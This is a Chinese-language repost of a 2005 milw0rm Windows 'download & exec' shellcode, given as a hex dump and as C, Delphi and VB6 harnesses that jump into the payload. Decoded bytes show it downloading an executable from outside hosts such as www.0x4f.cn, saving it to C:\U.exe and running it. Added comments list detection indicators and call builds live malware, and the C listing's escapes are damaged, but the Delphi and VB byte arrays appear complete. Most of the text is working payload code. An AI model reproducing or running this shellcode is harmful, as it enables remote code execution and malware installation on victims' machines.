win32 download & exec shellcode 203 bytes


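milw0rm 上的 win32 download & exec shellcode(以下为十六进制串;解码后可见其内嵌字符串 urlmon.dll、落地文件路径 C:\g.exe 以及下载地址 http://www.xoxx.us/download/test.exe,这些都可作为检测特征。注意下文三份源码中的落地路径为 C:\U.exe,下载地址也各不相同):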

EB548B753C8B74357803F5568B762003F533C94941AD33DB360FBE142838F27408C1CB0D03DA40EBEF3BDF75E75E8B5E2403DD668B0C4B8B5E1C03DD8B048B03C5C375726C6D6F6E2E646C6C00433A5C672E6578650033C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C95BF8E4E0EECE884FFFFFF83EC04832C243CFFD09550BF361A2F70E86FFFFFFF8B5424FC8D52BA33DB535352EB2453FFD05DBF98FE8A0EE853FFFFFF83EC04832C2462FFD0BF7ED8E273E840FFFFFF52FFD0E8D7FFFFFF687474703A2F2F7777772E786F78782E75732F646F776E6C6F61642F746573742E657865

VC++:
/*
    ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode                              ::
:: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:>                                ::
:: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::

*/

#include
#include

/*
 * 32-bit x86 Windows "download & exec" payload kept as a string literal,
 * with the download URL appended as the final literal so it sits directly
 * after the last code byte.
 *
 * Strings and constants visible in the byte sequence that are useful as
 * static indicators when triaging a sample:
 *   75 72 6C 6D 6F 6E 2E 64 6C 6C 00  -> "urlmon.dll"
 *   43 3A 5C 55 2E 65 78 65 00        -> "C:\U.exe" (fixed drop path; the
 *                                        raw hex dump earlier on the page
 *                                        uses "C:\g.exe" instead)
 *   33 C0 64 03 40 30                 -> xor eax,eax / add eax,fs:[eax+0x30]
 *                                        (reads the PEB pointer)
 *   C1 CB 0D                          -> ror ebx,0x0D inside the export-name
 *                                        hashing loop
 *   BF 8E 4E 0E EC, BF 36 1A 2F 70,
 *   BF 98 FE 8A 0E, BF 7E D8 E2 73    -> 32-bit constants loaded into EDI
 *                                        before each resolver call; they
 *                                        match the commonly published
 *                                        rotate-13 hashes of LoadLibraryA,
 *                                        URLDownloadToFileA, WinExec and
 *                                        ExitProcess.
 *
 * The trailing URL literal is the network indicator for this variant; the
 * Delphi and VB listings on the same page embed a different URL.
 *
 * NOTE(review): as rendered on this page the escape sequences have lost
 * their leading backslashes, so this literal is plain text rather than
 * the byte sequence described above.
 */
unsigned char sh4llcode[] =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF"
"http://h0nest.org/1.exe";

/*
 * Test harness: prints a banner, stores the address of sh4llcode in a
 * function pointer and calls it. Nothing is validated and main has no
 * return statement, so the program's behaviour after the call is entirely
 * that of the payload bytes.
 *
 * sh4llcode is an ordinary initialised global array, so the call target is
 * in data memory. With DEP/NX enforced for the process, such a call would
 * be expected to fault instead of running. An analyst should treat any
 * build of this harness as live malware and handle it only inside an
 * isolated analysis environment.
 *
 * NOTE(review): the printf line below is extraction-damaged (the inner
 * quotes and the newline escape lost their backslashes) and does not
 * compile as shown.
 */
int main()
{

 /* function pointer that will be aimed at the payload buffer */
 void (*c0de)();
 printf("Win32 "download & exec shellcode"n");
 /* writes the buffer address through an int-sized store, so this only
    works where a pointer fits in an int (32-bit builds) */
 *(int*)&c0de = sh4llcode;
 /* control is handed to the data buffer here */
 c0de();
}

// milw0rm.com [2005-12-23]

DELPHI:

// Delphi test harness for the same 32-bit x86 "download & exec" payload.
// The program holds the payload in a typed constant and calls it through
// a procedure variable. It has no other logic.
program download;

const

// 230 bytes in total: 202 bytes of code followed by a 28-byte
// NUL-terminated URL (the run starting at $68, $74, $74, $70 = "http").
// Indicators visible in the table:
//   $75,$72,$6C,$6D,$6F,$6E,$2E,$64,$6C,$6C,$00 -> "urlmon.dll"
//   $43,$3A,$5C,$55,$2E,$65,$78,$65,$00         -> "C:\U.exe" (drop path)
//   $C1,$CB,$0D                                 -> ror ebx,0x0D in the
//                                                  export-name hash loop
//   $BF,$8E,$4E,$0E,$EC / $BF,$36,$1A,$2F,$70 /
//   $BF,$98,$FE,$8A,$0E / $BF,$7E,$D8,$E2,$73   -> constants matching the
//       commonly published rotate-13 hashes of LoadLibraryA,
//       URLDownloadToFileA, WinExec and ExitProcess
// The embedded URL differs from the one in the C listing on this page, so
// network indicators have to be extracted per sample.
ShellCode:Array [0..229] of Byte =
(
$EB, $54, $8B, $75, $3C, $8B, $74, $35, $78, $03,
$F5, $56, $8B, $76, $20, $03, $F5, $33, $C9, $49,
$41, $AD, $33, $DB, $36, $0F, $BE, $14, $28, $38,
$F2, $74, $08, $C1, $CB, $0D, $03, $DA, $40, $EB,
$EF, $3B, $DF, $75, $E7, $5E, $8B, $5E, $24, $03,
$DD, $66, $8B, $0C, $4B, $8B, $5E, $1C, $03, $DD,
$8B, $04, $8B, $03, $C5, $C3, $75, $72, $6C, $6D,
$6F, $6E, $2E, $64, $6C, $6C, $00, $43, $3A, $5C,
$55, $2E, $65, $78, $65, $00, $33, $C0, $64, $03,
$40, $30, $78, $0C, $8B, $40, $0C, $8B, $70, $1C,
$AD, $8B, $40, $08, $EB, $09, $8B, $40, $34, $8D,
$40, $7C, $8B, $40, $3C, $95, $BF, $8E, $4E, $0E,
$EC, $E8, $84, $FF, $FF, $FF, $83, $EC, $04, $83,
$2C, $24, $3C, $FF, $D0, $95, $50, $BF, $36, $1A,
$2F, $70, $E8, $6F, $FF, $FF, $FF, $8B, $54, $24,
$FC, $8D, $52, $BA, $33, $DB, $53, $53, $52, $EB,
$24, $53, $FF, $D0, $5D, $BF, $98, $FE, $8A, $0E,
$E8, $53, $FF, $FF, $FF, $83, $EC, $04, $83, $2C,
$24, $62, $FF, $D0, $BF, $7E, $D8, $E2, $73, $E8,
$40, $FF, $FF, $FF, $52, $FF, $D0, $E8, $D7, $FF,
$FF, $FF, $68, $74, $74, $70, $3A, $2F, $2F, $77,
$77, $77, $2E, $30, $78, $34, $66, $2E, $63, $6E,
$2F, $74, $65, $73, $74, $2E, $65, $78, $65, $00
); //www.0x4f.cn/test.exe

var
// untyped procedure variable used only to jump into the byte table
ShellCodeProc: procedure;

begin
// The call target is a data constant, not compiled code. A process with
// DEP/NX enforced would be expected to fault here.
// NOTE(review): treat any build of this program as live malware and
// handle it only inside an isolated analysis environment.
ShellCodeProc := @ShellCode;
ShellCodeProc();
end.

VB:

Attribute VB_Name = "Module1"
' VB6 test harness for the same 32-bit x86 "download & exec" payload.
' The only API it declares is user32!CallWindowProcA, whose first argument
' (lpPrevWndFunc) is a code address that user32 calls. Main passes the
' address of a byte buffer there, so the API is used purely as a way to
' transfer control to data.
' Detection note: a CallWindowProcA call whose lpPrevWndFunc points into
' array or heap memory rather than a loaded module image is the behaviour
' to look for. With DEP/NX enforced, the transfer would be expected to
' fault.
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Sub Main()
' ShellCode has no declared type, so it is a Variant; it receives the
' Variant array built by Array(). download is the contiguous Byte buffer
' the values are copied into.
Dim ShellCode
Dim download() As Byte
' Same byte sequence as the Delphi listing on this page. Readable parts:
' &H75,&H72,&H6C,&H6D,&H6F,&H6E,&H2E,&H64,&H6C,&H6C,&H0 = "urlmon.dll",
' &H43,&H3A,&H5C,&H55,&H2E,&H65,&H78,&H65,&H0 = "C:\U.exe" (drop path),
' and the trailing run from &H68,&H74,&H74,&H70 ("http") to the final &H0
' is the NUL-terminated URL "http://www.0x4f.cn/test.exe".
ShellCode = Array(&HEB, &H54, &H8B, &H75, &H3C, &H8B, &H74, &H35, &H78, &H3, _
&HF5, &H56, &H8B, &H76, &H20, &H3, &HF5, &H33, &HC9, &H49, _
&H41, &HAD, &H33, &HDB, &H36, &HF, &HBE, &H14, &H28, &H38, _
&HF2, &H74, &H8, &HC1, &HCB, &HD, &H3, &HDA, &H40, &HEB, _
&HEF, &H3B, &HDF, &H75, &HE7, &H5E, &H8B, &H5E, &H24, &H3, _
&HDD, &H66, &H8B, &HC, &H4B, &H8B, &H5E, &H1C, &H3, &HDD, _
&H8B, &H4, &H8B, &H3, &HC5, &HC3, &H75, &H72, &H6C, &H6D, _
&H6F, &H6E, &H2E, &H64, &H6C, &H6C, &H0, &H43, &H3A, &H5C, _
&H55, &H2E, &H65, &H78, &H65, &H0, &H33, &HC0, &H64, &H3, _
&H40, &H30, &H78, &HC, &H8B, &H40, &HC, &H8B, &H70, &H1C, _
&HAD, &H8B, &H40, &H8, &HEB, &H9, &H8B, &H40, &H34, &H8D, _
&H40, &H7C, &H8B, &H40, &H3C, &H95, &HBF, &H8E, &H4E, &HE, _
&HEC, &HE8, &H84, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, _
&H2C, &H24, &H3C, &HFF, &HD0, &H95, &H50, &HBF, &H36, &H1A, _
&H2F, &H70, &HE8, &H6F, &HFF, &HFF, &HFF, &H8B, &H54, &H24, _
&HFC, &H8D, &H52, &HBA, &H33, &HDB, &H53, &H53, &H52, &HEB, _
&H24, &H53, &HFF, &HD0, &H5D, &HBF, &H98, &HFE, &H8A, &HE, _
&HE8, &H53, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, &H2C, _
&H24, &H62, &HFF, &HD0, &HBF, &H7E, &HD8, &HE2, &H73, &HE8, _
&H40, &HFF, &HFF, &HFF, &H52, &HFF, &HD0, &HE8, &HD7, &HFF, _
&HFF, &HFF, &H68, &H74, &H74, &H70, &H3A, &H2F, &H2F, &H77, _
&H77, &H77, &H2E, &H30, &H78, &H34, &H66, &H2E, &H63, &H6E, _
&H2F, &H74, &H65, &H73, &H74, &H2E, &H65, &H78, &H65, &H0)

' Size the Byte buffer to the same upper bound as the Variant array.
ReDim download(UBound(ShellCode))

' Copy element by element so the values end up as consecutive bytes.
' i is never declared in this listing.
For i = 0 To UBound(ShellCode)
     download(i) = ShellCode(i)
Next

' Passes the address of the first byte as lpPrevWndFunc; the remaining
' arguments are all zero. Control is handed to the buffer here.
' NOTE(review): treat any build of this module as live malware and handle
' it only inside an isolated analysis environment.
CallWindowProc VarPtr(download(0)), ByVal 0&, ByVal 0&, ByVal 0&, ByVal 0&

End Sub

文章来源于lcx.cc:win32 download & exec shellcode 203 bytes
